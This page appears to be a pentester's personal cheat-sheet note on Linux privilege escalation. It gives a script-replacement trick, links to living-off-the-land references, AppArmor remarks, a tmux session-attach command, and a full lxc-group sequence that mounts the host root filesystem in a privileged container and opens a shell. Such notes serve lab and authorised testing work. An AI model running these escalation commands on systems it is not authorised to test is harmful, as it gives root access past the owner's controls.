<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>privesc</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>privesc</h1>

      <div class="ck-content">
        <p>If there are scripts being invoked in a directory you have access to/own
          but you don't own the files themselves, you can simply delete the file
          and create a new one :)</p>
        <p><a href="https://lolbas-project.github.io/#">https://lolbas-project.github.io/#</a>

        </p>
        <p><a href="https://wadcoms.github.io/">https://wadcoms.github.io/</a>

        </p>
        <p><a href="https://filesec.io/">https://filesec.io/</a>

        </p>
        <p><a href="https://malapi.io/">https://malapi.io/</a>

        </p>
        <p><a href="https://lots-project.com/">https://lots-project.com/</a>

        </p>
        <p>Apparmor can limit capabilities on programs, preventing standard privesc,
          check the apparmor “config” file for the program under <code>/etc/apparmor.d/usr.bin.&lt;program&gt;</code>,
          which can allow certain commands/processes to run, such as copying files(with
          a certain name/location) with root etc.,</p>
        <p>To privesc or access tmux sessions, use:</p><pre><code class="language-text-plain">tmux attach-session -t 0</code></pre>

         <h2><strong>lxc group</strong></h2><pre><code class="language-text-plain">lxc image import ./apline.tar --alias myimage

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh
</code></pre>
      </div>
    </div>
  </body>

</html>